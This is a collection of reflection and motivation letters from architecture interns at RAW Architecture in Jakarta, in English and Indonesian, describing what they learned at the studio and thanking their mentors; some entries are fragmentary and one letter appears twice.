Devi Annisa – Universitas Budi Luhur

Reflection Letter:

Salam

Devy Annisa

Khairina Alfin Nada – Institut Teknologi Nasional

Reflection Letter:

Hi! I’m Nada, I’ve graduated from college in 2022. After graduating from college, I felt that I still had a lot to learn and find other perspectives on architecture to make me more confident and have a meaningful goal to be involved in architecture. Therefore, I decided to do an internship first before entering the real world of work.

I applied to several places to do internships. At that time, I almost gave up because no one came to informed me. Until finally I received news from RAW Architecture that I was accepted to do an internship there. After receiving the news, I felt grateful and happy and at the same time worried too, I was worried about not being compatible during the internship and because this was the first time for me to wander so there were many things that worried me. But I realized I had to be able to fight my worries because if I didn’t fight it I would never try and never know and never move forward. I have to get out of my comfort zone to become a more developed human being. After going through it, it turned out that it was not as bad as I imagined before because here I was warmly welcomed by a friendly and supportive environment so that it made my adaptation and learning process feel lighter.

I have been doing my internship here for almost 3 months and I can’t believe that my last day of internship has come. If I am asked what do I get from here? The answer is everything, because it’s my first time doing an internship at an architectural consultant, so everything is new and interesting for me to learn. Starting from the culture of working at a consultant is like, learning about conceptual to detailed development drawings, working together as a team, and many more. The thing I like the most and I look forward in here is the weekly meeting on monday because at that moment we can share and know the good and bad reality that happens in the studio and in the project. Jokes and casual talks during break time are also fun moments for me.

I want to say big thank you to Mr. Realrich Sjarief and Mrs. Laurensia Yudith for giving me the opportunity and trust to do an internship at RAW Architecture. Thank you also to all of my mentors who have given their knowledge and patience in guiding me during my internship.  To all of my fellow interns as well, thank you for makes my day colorful during this internship program. And I also apologize if there are words or deeds that are impolite during my internship.

Lastly, thank you to RAW Architecture for being a part of my journey in finding my identity in architecture. I learned a lot of new things here, and it will be an unforgettable experience for me. I wish all the best for Raw Architecture team, Good luck!

Sincerely,

Khairina Alfin Nada

Motivation Letter:

Dear RAW Architecture,

Let me introduce myself, my name is Khairina Alfin Nada, people around me usually call me Nada. I am a fresh graduate from National Institute of Technology Bandung (Itenas). Through this letter, I would like to express my interest to intern as an architectural designer in your firm.

I want to tell you about my experience while studying in the architecture department. At first, the reason I majored in architecture was simply because I liked to draw and what I knew about architecture was just study about buildings. At the beginning of learning, I was quite surprised by the learning culture in architecture, such as the studio assignments which were quite a lot, detailed, and required a lot of time to complete it. Finally, over time I can adapt and follow it well. First semester to third semester, I took lectures with enthusiasm and also always got a good grades in every subject.

Until at the end of fourth semester, I started to feel bored in going through lectures. Many questions suddenly appeared in my mind that I realized I had never asked myself these questions. Questions like, “am I really happy in this field ?, “Can I survive in this field ?”, “What am I here for ? What am I looking for here? Or during this lecture I just run it for a formality ?”. These questions keep popping up in my mind and make me dizzy and anxious. At that moment, I realized I couldn’t go on like this, I had to be able to get answers for all of these questions.

Starting from these questions, I started to find out more about architecture. I started looking at podcasts, portfolios, reading books and articles about architecture. Fortunately, little by little these activities were able to answer my anxiety and restore my sense of enthusiasm in architecture. In fact, I am increasingly curious about the world of architecture. From this activity, it also made my perspective more open to architecture and made me realize that so far in the design process, I have not interpreted it and I have less research, I only pursue the word “finished” without interpreting what I design. And I regret that I was wrong and just realized it.

To correct my mistake, in sixth semester, I started to improve my designing process. Starting from the process of designing on the design studio assignments until I also started like to take part in architectural competitions. For me, participating in competitions is a refreshing activity. I can express my designs more freely than in technical and formal coursework. I can create my imagination accompanied by critical thinking and I can also see other perspectives from group members.

During the final project, I designed a special heart and blood vessel hospital in Bandung with the theme, namely the interrelation of space with behavior. The reason I picked up that theme because I was interested in delving into how space can affect its users. Another reason is I want my final project to serve as a tool to rethink the typology of a hospital from seemingly creepy to a place that’s comfortable, quiet, and how space can proactively contribute to a healing environment, especially in the context of a stress-inducing healthcare environment.

Now I realize, architecture is more than just a building. Architecture can influence and shape human habits. Architecture is not like the others arts that you can choose to see or not to see but architecture can envelope all of us. Everyone sees and experiences it. Architecture is an art that everybody deserves to enjoy precisely because it constitutes the life of our inhabited places.

After visiting the website and seeing some RAW projects, I became interested in joining RAW internship program. I believe RAW Architecture is the best firm to be a part of my process to finding my true self in architecture and fulfilling my curiosity in exploring knowledge.  I hope that at RAW I can practice creativity, critical thinking that can open up my perspective more broadly on architecture, and learn more about how to make good and correct designs, as well as how to enjoy the design process.

It would be such as a great experience if I could have a chance to be a part of RAW Architecture.  I would love to explore more experience, work hard, and contribute for RAW Architecture in many aspects in the future.

I am very open if there are things you want to ask regarding this application. Thank you for your time and consideration.

Sincerely,

Khairina Alfin Nada

Satria Aulia Firdaus – Universitas Sebelas Maret

Reflection Letter:

Dua minggu pertama magang disini, jujur aku agak kaget sama workflow RAW soalnya kaka-kaka nya sering banget lembur “ternyata mitos arsitek sering begadang benar guys” tapi mereka pada enjoy sih keliatannya. Ohiya, tiga minggu pertama aku ditempatin di divisi desain terus dimentorin sama ka riyan. Aku seneng banget karena disini aku jadi tau cara kak rich brainstorming desain melalui sebuah sketch. Sketchnya ka rich keren banget menurut aku.

Setelah itu, aku ditempatin di divisi build bersama bang putra khairus shidqi jamet jakbar is in the house. Kalo penasaran nanti hubungi aku aja.

Terimakasih RAW

salam hangat, satrio

Motivation Letter:

Kepada Yth

Pimpinan / Principal

Realrich Architecture Workshop

Atas perhatiannya, diucapkan terimakasih

Jabat Erat,

Satrio Aulia Firdaus

Qealyn Diamanta Adikusuma – Universitas Gadjah Mada

Reflection Letter:

I’m not good with words, but to say I’m grateful for my first internship at RAW Architecture is an understatement. Haloooo, semuanya! My name is Qealyn, and I’m currently in my fifth semester studying at UGM.

First and foremost, I want to give my deepest gratitude to Kak Realrich and Kak Yudith for providing me the opportunity to work at RAW Architecture. Also, thank you to everyone in this office family for welcoming me and making every day here so special. These past two months have been, just like the Coldplay lyrics, an adventure of a lifetime!

Even just listening to Kak Realrich talk about mundane office things taught me a lot. Every week, I look forward to attending the weekly Monday meetings, hearing lessons he evaluated from the past week and stories regarding ongoing projects. His philosophies about the beauty of architecture, ambition to achieve the best possible results, ways to communicate inside and outside the office, inspired me greatly to deepen my knowledge in architecture. I realized from Kak Realrich that in architecture, it is very important to build trust (from clients, working partners, and, of course, the office itself) than to just deliver wonderful works. Maintaining it would be difficult, but the end outcome would be long-term.

From the kakak-kakaks in both Design and Build, I learned that being in RAW Architecture is like going back to school. Every day, you learn something new (sudah kayak 10 sks setiap hari). From the beginning, I knew that with my liiiiiiiiitle experience in architecture, there would be tons of things that I have to catch up on. But oh my, on my first days here in the office, turns out I know waaaaaay less than I thought! It was a massive slap in the face; there is so much to learn in such a short period of time. At first, I was afraid I could not keep up with everything. Fortunately, everyone in RAW are all willing to help. They will gladly correct even my minor errors and answer the most simple and ridiculous questions with open arms and ears. I could never imagine that I could learn this many theoretical and practical knowledge from the coolest people in such a short time.

Terima kasih, terima kasih, terima kasih. To Kak Riyan as the PIC for the interns, Kak Mel, Kak Vyan, and Kak Angel who accompanied me in my first month here, it was memorable screaming songs at Benteng with you guys! To Kak Haykal, Kak Evan, Kak Alim, Teh Al, Kak Mei, thank you for guiding me throughout my second month “di atas”, and of course to everyone, the good conversations and laughter over snacks and meals will be treasured in my heart. To the kakak-kakak at Omah Library too for having me around and letting me in ehehe. Finally, to all of my fellow interns, Reva, Rio, Nada, Seva, Ippi, Jessica, Uung, Inggrid, Rifa, Heru, hope to see you again, see you guys on top!

Motivation Letter:

Dear HR of RAW Architecture,

Allow me to introduce myself. My name is Qealyn Diamanta Adikusuma. I am currently

studying the field of architecture in Universitas Gadjah Mada, now in my fourth semester. I

have been exposed to RAW Architecture’s amazing works, and I intend to apply for an internship as I wanted to learn more about architectural problem-solving during this semester break.

Even though my time studying architecture hasn’t been long, I knew from the start that a

part of me sparked every time there was a discussion about problem-solving in an architectural approach. The way that RAW has buildings focused on poetic design drives me more into my studies. Topics about combining modern natural materials, the beauty of tectonics, and the experience of space itself have fascinated me. Currently, my current goal is to increase my understanding in those fields and deepen a more thorough knowledge through internships.

As an architecture student myself, I love to start projects by starting with the “Why” and the “How”, and ending with the “What” as a solution. Concept exploration that comes after analysis is something I am passionate about. This leads me into working in an organized and systematic manner, creating a designed framework. In working, I also love to contribute to group work and community projects, as I naturally like to step in for leadership roles.

I highly believe that by joining the internship program, I will be able to study more in-depth about how RAW design and solve problems. Moreover, I am confident that this internship is essential to help me develop as an architecture student, it will give me more insight into the architecture field. This is an opportunity I would not pass up on.

Sincerely,

Qealyn Diamanta Adikusuma

Muhammad Kemal Haqqy – Universitas Indonesia

Reflection Letter:

Nama saya Muhammad Kemal Haqqy lulusan 2021.

Reflection Letter:

Jessica Eleora / RAW Internship

I learned of the phrase “a sense of place” in the third year of my university days. I’ve been researching and learning about the term all these years, but during my stay at RAW Architecture, I’ve finally understood what it means. I applied as an intern in RAW Architecture not knowing what I was going into. During this 6 months of internship, I’ve obtained so much, not only in knowledge regarding architecture, but also enrichment in life views to grow as a person. I met a lot of people with different backgrounds and views who are  very kind hearted, smart, open minded, playful, strong headed but at the same time very warm. In life, I’ve always believed that every encounter with someone means something and there is never “nothing we can learn” from our experiences. I hope the best for everybody in RAW, and I hope we may be able to cross paths again one day. My time in RAW with all the amazing people in it is and will always be one of the most valuable experience in my life.

I give my special thanks to Mr.Realrich Sjarief and Mrs.Laurensia Yudith for giving me the opportunity as well as advices and welcome during my stay in RAW Architecture and Workshop. Thank you for all the lead architects who have been always caring and listening as well as looking after all of us, Ci Joanna, Kak Pandu, Kak Timbul, and kak Riyan. Thank you for the amazing mentors who have taught me so much skills and knowledge, Kak Fina, Kak Melisa, Kak Alim, Kak Haykal, Teh Adzlin, Kak Riko, Kak Audy, Kak Vyan, Kak Sofi, Kak Putra. Thank you for the people who’ve always been my support and helping me in various kinds of ways having become very dear friends to me, Tyo, Zikri, Gaby, Evan, Khafyd, Janice, Qealyn, Reva, Manuel, Devi, Nada, Seva & Ippi!

P.s. Thank you Bibi Yanti for always cooking for us and the blue team for always keeping the office clean!

Have a nice day!

Revania – Institut Seni Indonesia Yogyakarta

Reflection Letter:

Hi, aku revania, mahasiswa desain interior semester 7 dari ISI Yogyakarta. 4 bulan  magang berlalu juga akhirnya ya. kalo 4 bulan ini jadi judul buku, mungkin judulnya, a serendipity: the coincidence of finding things that you didn’t intend to find before. karena sebelum memantapkan magang di RAW aku dihadapkan oleh dua pilihan. magang nyari sendiri atau magang bersama dosen. dan gatau kenapa kayak ada sebuah bisikan bahwa aku harus di jabodetabek untuk beberapa waktu lagi. jadi aku mantepin untuk nyari magang sendiri.

kata yang pas untuk menggambarkan hari pertama adalah: intimidating. setelah tau bahkan anak anak intern nya aja keren keren bgt, ada beberapa yg udh lulus juga, jadi semakin merasa terintimidasi.  tapi ternyata it does me favors bgt karena di awal awal i ended up menjadi beban anak anak intern karena nanya mulu.

satu bulan lebih beberapa hari dikit, aku ngerjain bobotoh WKWKWKWK. di situ jujur ngerasa gaenak bgt karena selama itu ngerjainnya. tapi emang dari bobotoh banyak bgt ilmu shortcut, extension, yang didapetin. sampe ditanyain sama jessica, “rev lo ga bosen apa? kalo bosen di bobotoh bilang aja biar lo pindah” sebenernya jawabannya adalah gaenak sih. kayaknya kalo udh memulai ya harus diselesaikan gitu. walaupun akhirnya kak rian kayaknya capek nanyain progres bobotoh jadi aku dipindahin ke rumah christine. di rumah christine dapet project desain akhirnya. disitu aku banyak ngerepotin evan sama kak billy (vyan). sampe akhirnya ngerjain tugas gambar dan occasionally pindah tempat duduk yg diapit kak billy sm kak gaby biar intens belajar autocad. akhirnya hampir tiap menit aku ngerepotin kak billy, dan fix bgt pasti ada hari hari dimana kayak “reva pindahnya kapan sih”

kalo ditanya apa yang didapet dari RAW, wah i owe this place, these people, a lot. dari yang gapernah pake laptop in daily basis jadi matanya berair pas udh beberapa jam jadi yg bisa tahan 7 jam ke atas, dari yg ngeliat gambar kerja di pc kak billy dan kak gaby rasanya pengen puyeng jadi bisa kayak “ohhh iya mau diapain niih”, dan dari yang ngerjain bobotoh satu bulan jadi ngerjain 3d model rumah citraland dalam sehari. these 4 months have been the most magical dan semoga unforgettable class that i signed up into. terima kasih terutama untuk kak rich dan kak yudith untuk kesempatan magangnya di the most aesthetic kantor in jakbar. terima kasih untuk kakak kakak conceptual, kak rian, kak mel, kak billy, kak haykal, evan, angel. terima kasih juga untuk kakak kakak yg kita pernah bersama walau sebentar bgt, kak tyo atas tangga monyet experiencenya, kak gaby atas spreadsheet lessonnya, kak fina atas tangga servisnya. terima kasih juga kepada teman teman magang; devi, reji, zikri, manuel, jessica, doni, kemal, seva, ipi, rio, qea, nada dan uung!!

balik ke awal, ternyata bangunan guha ini itu adalah jawaban dari dua pilihan kebingungan aku kemarin, magang sendiri atau magang sama dosen. mungkin kalo dijalanin dua duanya, sebenernya pilihannya gaada yg salah. karena yaa kayak bangunan ini, jawabannya bener bener: ada banyak jalan menuju suatu tujuan. dan kalo mau jujur, im really glad that i chose this path.

semoga setelah ini kita tetep bisa jalin silaturahmi ya. jangan sungkan sungkan randomly dm aku karena dm-ku kayak mcdonald’s: buka 24jam. jangan sungkan juga ngajak main, intinya kalo tida mager dan lagi fomo, pasti kita jalan. I can’t wait to be crossed-path with you guys in the very very bright future that we will be in!

Stefanus Wardhana – Universitas Atma Jaya Yogyakarta

Reflection Letter:

Life is a never-ending journey, stay in the incessant quest for the imagined things and keep being the best, RAW!

Salam Hormat,

Reflection Letter:

Thank you RAW!

Renadi Mohammad Rediansyah – Universitas Tarumanagara

Reflection Letter:

Enjoy the Process – Renadi Mohammad Rediansyah

Selama magang saya banyak mengambil pelajaran arsitektur sampai kehidupan.

Salam Hormat,

Manuel Hendru – Universitas Multimedia Nusantara

Reflection Letter:

Hello! My name is Manuel Hendru who is usually called El in RAW. I’m a 7th semester student at Multimedia Nusantara University, Tangerang who got the opportunity to be able to contribute to the work being done at RAW Architecture as an intern student for 6 months (which initially only planned for 4 months HAHA). Before deciding to do practical work in the office that I will apply for, there are many considerations as well as the expectations that I can get when I do my internship in that office. One of them is that I want experience in working and expanding relationships in the office. So, apart from the firm work being convincing, the work environment is also very influential and is a big consideration for me in choosing an internship place.

RAW Architecture has become one of the offices that I have known since I first entered college. Kak Rich himself once gave a seminar on my campus, which at that time I was very impressed with his presentation. The way the presentation was deep and fun made me enjoy learning about what Kak Rich was presenting at that time. Because of that, I’ve also started to recognize the building designs produced by RAW and I love them. What’s more, I also saw several posts from ig @guhatheguild which feature dynamic and exciting office life too. Long story short, I finally decided to apply to RAW Architecture as one of the agencies I wanted to learn more about architecture and open relationships because of these three factors.

When I first entered the studio, I was immediately greeted by Kak Rich and also the working staff through a brief self-introduction. In that short introduction, we joked a lot and laughed together. It was at that moment that I immediately thought that I was not mistaken in choosing RAW Architecture to be the office I was assigned for my internship for 4 months from 20 June – 22 October.

During those 4 months, I really learned and was happy to get to know many things that are far deeper than what I got at college. In fact, several times I was also often invited to go to the field and learn directly about building construction. However, 4 months was not enough time for me to learn many things in the built field. So, I finally decided to extend. My decision to extend was also not easy for me and it took me quite a while to think about it until I made a unanimous decision on d-1 the day before I ended my internship and contacted Kak Rich and the admin that I wanted to extend until December 23. To be honest, on that day, I was quite afraid that this decision would not be the best for me because I had to divide my time more between work and college. The course I was taking at that time was a research seminar that determined my Tugas Akhir. And yes, in the end I took a lot of time off to take care of my seminars in my extended days. But, even though I’m on leave, I still get a lot of knowledge in built that I really want and I don’t once regret the decision to extend it.

Of course, I would like to thank Kak Rich for giving me the opportunity to contribute a little as an intern student. I am very happy to know Kak Rich as a leader who is very humble and I really look up to him.

Big thanks to Kak Mei, Mas Alim, Kak Fina, and Sofi for “accepting” me in their team to help with some work on the built project that I’m working on hehe

Thank you also to Tyo who has become my 911 in RAW both in work and other life and open Tyo-Tour and Travel on Saturdays/Sundays to Bandung, cool.

To Ms. Riyan, who taught architectural concepts for the first time to me and other staff members or interns who have colored my monochrome life every day.

Until finally, I can say that doing an internship at RAW is a valuable experience that I can’t forget until I’m old. Because at RAW, I don’t only get knowledge of architecture and construction, but also laughter from all of you who have given meaning and added to my collection of precious moments in my life. For me, RAW is not only “The Best Office in The World” but also “The Best Home in The World” where we can feel the warmth of everyone in it.

Sending hugs and the best wishes for each of you MUAH xixi

Best Regrads,

Manuel Hendru

Motivation Letter:

Atas perhatian Bapak/Ibu, saya ucapkan terima kasih.

Devi Angraini – Universitas Multimedia Nusantara

Hello, I’m Devi, a 7th-semester architecture student from Multimedia Nusantara University, Tangerang. Just being a student and hearing my lecturers talk about working in architecture makes me wonder what it feels like to be in a real architecture field and what would be different from what I got at university. That is why, during my inter-semester break, I decided to apply for an internship at several architectural bureaus and RAW is one of them. RAW’s projects shown by Kak Rich in my several campus webinars amazed me with how the projects are different from others. It made me want to analyze and learn more about that in some of my assignments and become the reason why I chose RAW as my intern office.

But the thing is, I have no clue at all about the culture and how the people work in RAW since my seniors on campus never do internships or work there. So I asked Kak Gaby who is a former intern at RAW about that, looked for the information on Guha The Guild’s Instagram which showed that Kak Rich usually gathers the team and talks not just about architecture but also about life which interests me, and hoped it will be “The best office in the world”, just like what they say.

On the first day of entering Guha, I already know that I can learn a lot here just by looking at the unique doors it has. Then after meeting the team and starting to work here, I am more than convinced that this is indeed the best office in the world. The people here are so warm, humble, willing to share their knowledge about everything, and also patient when teaching us. I learn a lot about architecture in depth by understanding details that I didn’t get much before, communicating with a team, learning new architecture software which I’ve never used before, and making a design from scratch than making it real. Not only about architecture, but I also learned about a lot of aspects of life such as friendship, relationships, work, education, and many more by hearing people’s various interesting and funny stories. By this, for me, Guha feels like a second home where you can get the warmth from the people and get every information you need to face the wild world out there.

Four months here feels not enough to gain and learn all the knowledge that RAW’s team and the project have but I’m really grateful for having a chance to do an internship here, thank you to Kak Rich. I also want to thank Kak Rich for sharing many insights about architecture and advice on how to become a better person in every meeting, being humble, and appreciating every little thing. Thank you to all the team, Kak Pandu, Kak Riyan, Kak Timbul, Kak Tyo, Kak Al, Kak Rico, Kak Alim, Kak Haykal, Kak Gaby, Kak Putra, Kak Melisa, Kak Khafyd, Kak Kirana, Kak Audy, Kak Vyan, Kak Fina, Kak Sofi, Ci Mei, and Evan for every knowledge, stories, and time that you share with me. Also thank you to my intern friends, Manuel, Nanda, Damas, Zyadi, Ryan, Akmal, Janice, Jessica, Reji, Zikri, and Reva for accompanying me during my internship. It is such a blessing to get to know amazing people like you. I hope the best to RAW and every one of you in every journey of your life. I hope we can meet or work again together in the future.

Irviananda Adenia – Universitas Pembangunan Jaya

Hello everyone! My name is Irviananda Adenia, but everyone calls me Nanda. I am a fourth year student from Universitas Pembangunan Jaya, Bintaro, South Tangerang. As an architecture student, I am always seeking opportunities and challenges that can improve myself more, so I tried to apply for an internship at Realrich Architecture Workshop for the past three months. I do believe that RAW Architecture can provide a supportive environment to experience what I have learned in college, and joining as an intern at RAW turned out beyond all my expectations.

I can say that the past 3 months, from 6th June – 26th August 2022, were totally an incredible moment in my life. The first time I entered Guha, the atmosphere was unreal. It feels like it gives me comfort, spirit, and warmth, but also clueless and full of fear inside mine. But, that feeling of confusion disappeared immediately when I met the whole RAW team who were very humble and welcomed me happily. In just a few seconds, I can already conclude that RAW studio is full of amazing and passionate people.

As an intern, I learned a lot about the architecture world, either focusing on design or building. All designers here transfer their knowledge and perspectives on almost everything, how to develop a building concept, expertise in operating software, solving a problem in many projects, coordinating and contributing with each other, making details for construction needs, and also a professional attitude as a worker. They also remind me that architecture is not only about buildings, but also about feelings, belief, passion, and the story behind it. Not only in the scope of architecture, but I also got to know various stories and experiences about life, work, college, and education, which makes me think more to take the next step to the important moments ahead.

Thank you, Kak Rich, not only for giving me the opportunity to process here but also for teaching me many things about the community that we need to know earlier. The stories behind his experience have made me think about the important steps I must take to continue my life and education, both inside and outside the world of architecture. Thank you to all designer team, Kak Timbul, Kak Pandu, Kak Alim, Kak Riyan, Kak Tyo, Kak Rico, Kak Haykal, Kak Putra, Teh Al, Kak Gaby, Kak Melisa, Kak Kirana, Kak Audy, Kak Vyan, Ci Mei, Kak Fina, Kak Sofi, and Kak Khafyd, for giving me an appreciation, affection, and wonderful mentorship experience. Thank you for always making me laugh and making me more grateful every day. My internship friends, Zyadi, Akmal, Ryan, Damas, Manuel, Devi, and Janice, it was really nice to know you guys. Thank you for being such great friends and helping me in almost everything in Guha. I also want to say thank you to Kakak-Kakah OMAH, Bibi, and other RAW teams, for being humble and friendly to me. Once again, my life as an intern at RAW was beyond all my expectations. With all the new project work, knowledge, people, experiences, laughter, and great memories, three months feels very short. Thank you, thank you. Hopefully, we can meet again in my other favorite chapter of life.

Damas Dwinito Pradipta – Institut Teknologi Bandung (ITB)

Hi there! My name is Damas Dwinito Pradipta, but you can call me Damas. Currently, I’m studying architecture at Institut Teknologi Bandung. By the time I write this letter, I’m in the 7th semester of my study. During the last semester break, I applied to many architectural firms to do an internship program. RAW is one of the firms I applied to. I chose RAW to be on my application list because I think that RAW could give me much knowledge and experience, especially about detail and technical things.

After a long wait, finally, RAW accepted my application and gave me a chance to be an intern there. Honestly, at first, I don’t feel that delighted being accepted here because it was my last internship option. But, over time, after doing an internship here, I take all my words back.
RAW fulfills all my expectations, even beyond. In Guha, how we usually called the office, I learned everything about architecture practice. Here, all the architects transfer all the knowledge sincerely. They thought me everything about architecture practice hand to hand. I learned how
to be good at designing, understanding details, and enhancing visualization skills. More importantly, They broaden my perspective on architecture. I realized architecture is not only about designing things to be aesthetic. It’s all about integrity between multi-discipline. A great architect is those who are not only good at designing, but as well as communicating, and collaborating with other.

At last, I would like to thank Kak Rich to allow me to be part of this wonderful team. Thank you for being such a humble and warm person. Thanks to all the seniors there for giving me a great mentorship experience. The intern there is, inadvertently, also lively and fun. I am so glad to have them as peers. For the past 2 months, for me, Guha is not my workplace. It is a place for nurturing. I feel grateful that RAW could be part of my professional journey. I wish you all the best things to happen in your life. I hope we could meet again someday!

Warm regards,
Damas Dwinito Pradipta

Ryan Dwi Priyambodo – Universitas Sriwijaya (Unsri)

Halo!

Thank You everyone for welcoming me into RAW with a warm smile,
I hope to see you all again!

Muhammad Zyadi – Universitas Sriwijaya (Unsri)

Hello, My name is Muhammad Zyadi. I’m a 7th-semester architecture student from Sriwijaya University. I’ve been lucky to get the chance and be part of the Realrich Architecture Workshop (RAW) as an intern. Being in RAW itself is a dream come true for me. I never thought that I would come to Guha as an intern.

I’ve been interested and always curious about architecture, from semester to semester I’ve always put my best to learn about architecture. For me, my ambition is what keeps me pushing myself. But that is where the wrong thought started to show up. That ambition created ego and it affected how I’ve been designing in architecture. All I knew was just I wanted this and that and how it can be applicable to the design even though it’s still based on analysis.

During my Internship at RAW, I learned that it’s not about me, It’s about us the architect, the client, and the site and building itself. It’s not about what I as the architect want but it’s about how we create harmony between the architect, the client, the site, and the building. All the decisions that we make will affect how the user will experience the architecture and that is crucial. RAW changed my perspective on architecture, it taught me to see wider and further but also closer at the same time. I learned a lot about design, construction and its details, visualization, the attitude to work as a team, and how to communicate our thoughts in design.

Besides architecture, I feel grateful to be able to experience my first-time “work” experience in such a harmonic supportive work environment. I never expected to get this experience in an internship. The warmest smile people have given to me since day one, the story and laugh we shared in the pantry, foyer, studio, internship room, or outside Guha with “Tyo Tour and Travel” was unforgettable. During the last few days, I tried to capture the moment as much as possible because I know the time will surely end and the moment can’t be repeated.

The first time I heard “Realrich Architecture Workshop ” the thing that appeared in my mind was that it’s just a great architecture Firm. But now, every time I hear “Realrich Architecture Workshop” every beautiful moment with all the people there is a glimpse in a split second in my mind. RAW isn’t just a great architecture firm but also a place where I learned a lot of things about architecture, a place where I met a lot of people with beautiful souls and their own character, and a place where I feel joy and endless excitement to learn about architecture and interact with the people there. RAW with Guha as its office is a beautiful place but what is inside is way more beautiful.

Thank you kak Rich for the opportunity and mentorship, thank you to everyone inside the studio, and omah for everything, I’m not sure that every single one of you constantly interacted with me but one thing I can be sure of is all of you are written in one of my favorite chapters of my life. Wishing you the best everywhere you go, you guys deserve good things in life.

Warmest regards,
Muhammad Zyadi

Muhammad Akmal – Universitas Sriwijaya (Unsri)

Hi everyone, my name is Muhammad Akmal, as of writing this I am a 21 years old uni student riding along life with a huge passion for architecture. The passion which I’ve been brewing since the first time I heard the term ‘architect’ when I was little. But speaking honestly here, for the most part, I was blind and basically second-guessing the meaning behind the term, I find myself chasing the title more than what’s being held by it. Realizing the problem, I had always tried to put myself in a different environment from time to time. this time I reached out to Realrich Architecture Workshop for an internship program and was fortunate enough to be accepted.

Throughout the short time I was there I was able to learn so much more than I could tell, for the first time I was taught to put more meaning behind architecture, to realize that architecture is a journey of my own, and to cherish every step I took along the way. The experience I had as an intern in RAW make me think more critically about the environment and people around me and foremost about myself and my daily life. RAW taught me the ability to see architecture in the most detailed way and as wide as I could at the same time, to consider any and everything that my mind can reach.

Throughout my time as an intern in RAW, my passion for architecture grows even more, and my thirst for knowledge along with it. I am very grateful to Kak Rich for giving me this opportunity and to teach me a lot of things about architecture, be it design, development, and also philosophical matters. And also, I would like to thank all my seniors there for taking the time out of their packed schedules to teach me about all sorts of things from architecture and software to other important things such as life lessons. Lastly, to my new RAW architecture family, I wish you the best of the best.

Best Regards,
Muhammad Akmal

Aryo Phramudhito – Institut Seni Indonesia Denpasar

Best Regards,
Aryo Phramudhito

Evanjelicel Tamio Dimpudus – Universitas Pelita Harapan

Perkenalkan nama saya Evanjelicel Tamio Dimpudus, mahasiswa tahun keempat arsitektur Universitas Pelita Harapan.

RAW itu cair bagaikan air; “You must be shapeless, formless, like water. When you pour water in a cup, it becomes the cup. When you pour water in a bottle, it becomes the bottle. When you pour water in a teapot, it becomes the teapot. Water can drip and it can crash. Become like water my friend.” Begitu kata Bruce Lee.

Best Regards,
Evanjelicel Tamio Dimpudus

Angel Gabriella Kusuma – Universitas Kristen Petra

Hello! I’m Angel, a fellow learner, and explorer who’s also currently studying architecture at Petra Christian University Surabaya. Was born and raised in Surabaya for 21 years. In my last year as an undergraduate student, I decided to do an internship program in RAW to expand my exploration, and get new experiences as well as new perspectives on architecture and life.

The 24th of November, 2021 is the day RAW offered me a chance to do the internship program which I had applied for 3 months before. I still remember the feeling of waiting and how excited I got when Kak Yudith contacted and offered me the internship program. To be honest, the journey to get to that day wasn’t easy, and I guess that’s what makes that day so special. Through this letter, I would like to express my gratitude to the RAW family, especially Kak Rich and Kak Yudith, for giving me a chance to learn, meet, and work with amazing people in RAW Studio.

These past 4 months, RAW hadn’t only become my workplace but also my home. To work in RAW, I had to leave Surabaya, the place where I grew up and live for 21 years. Surabaya was my comfort zone, but I am glad that I had decided to step out of it, even for only a few months. Within 4 months in RAW, I had learned and gained a lot of knowledge and experiences which gave me a whole new perspective on architecture, the world, and even life. I learned new things that can only be obtained through field experience. I learned that architecture, details, construction, craftsmanship, and communication are inseparable. But, the thing I am most grateful for is that I was never alone. Going through this big change and process of knowing architecture, myself, and life, I was lucky enough to experience it with the best people in the world:) RAW has taught me that architecture is also about being part of a community and family. I believe that creating amazing architecture, also takes amazing teamwork and community.

During my internship, every once in a while, Kak Rich brought up this question “what is our purpose in life?”. This got me thinking, “what do I want in life?”, “where am I heading to?”, “is architecture part of my purpose in life?”. I have been trying to find the answer to these questions, until this one moment. I remember when my mentor had to leave and continue her own journey outside RAW. Kak Rich had mentioned that she had “touched” everyone with her presence and her relationship with others. At that moment, I thought, how beautiful it is? If one is able to touch someone with their presence. That thought made me reflect on myself. I guess for now I decided that my purpose is to be able to touch people with everything that I do, whether through my works in architecture or even through my actions towards others. Therefore, I am also thankful to Kak Rich, for bringing up questions that we were all afraid to ask ourselves.

4 months had passed so quickly. For all the knowledge, experience, wisdom, laughter, and memories, I thank everyone. No words can’t describe how grateful I am to spend the last 4 months in this new home.
Thank You Kak Rich for being such a humble person and for creating a supportive environment in RAW,
Thank You everyone for welcoming me into RAW with a warm smile,
I hope to see you all again!

Best Regards,
Angel Gabriella Kusuma

Maria Angela Rowa – Universitas Pradita

Mat pagi kak!””, ucapan wajib saya, Maria, memasuki Perpus Omah menyapa umi-umi Omah Library.

Tetaplah bahagia, :) Salam, M.A.R “

Motivation

I want to work in a research-based architectural firm, with lots of experiments on their projects. I feel that RAW is very powerful in doing experiments on its projects. I am also intrigue and curious about the design and craftmanship approach that is done in RAW. I hope I can learn a lot and get to know new mindset in RAW.

Angel Gabriella Kusuma – Universitas Kristen Petra

I’m Angel, a fellow learner and explorer who’s also currently studying architecture in Petra Christian University Surabaya. Was born and raised in Surabaya for 21 years. In my last year as an undergraduate student, I’ve decided to do an internship program in RAW to expand my exploration, get new experiences as well as new perspectives towards architecture and life.

The 24th of November, 2021 is the day RAW offered me a chance to do the internship program which I had applied 3 months before. I still remember the feeling of waiting and how excited I got when Kak Yudith contacted and offered me the internship program. To be honest, the journey to get to that day wasn’t easy, and I guess that’s what makes that day so special. Through this letter, I would like to express my gratitude towards the RAW family, especially Kak Rich and Kak Yudith, for giving me a chance to learn, meet, and work with amazing people in RAW Studio.

These past 4 months, RAW hadn’t only become my workplace but also my home. To work in RAW, I had to leave Surabaya, the place where I grew up and live for 21 years. Surabaya was my comfort zone, but I am glad that I had decided to step out of it, even for only a few months. Within 4 months in RAW, I had learnt and gained a lot of knowledge and experiences which gave me a whole new perspective towards architecture, world, and even life. I had learnt new things that can only be obtained through the field experience. I learnt that architecture, details, construction, craftsmanship, and communication are inseparable. But, the thing I am most grateful for is that I was never alone. Going through this big change and process of knowing architecture, myself, and life, I was lucky enough to experience it with the best people in the world:)

RAW has taught me that architecture is also about being part of a community and family. I believe that to create amazing architecture, it also takes amazing teamwork and community. During my internship, every once in a while, Kak Rich brought up this question about “what is our purpose in life?”.

That thought had made me reflect on myself. I guess for now I decided that my purpose is to be able to touch people with everything that I do, whether through my works in architecture, or even through my actions towards others.

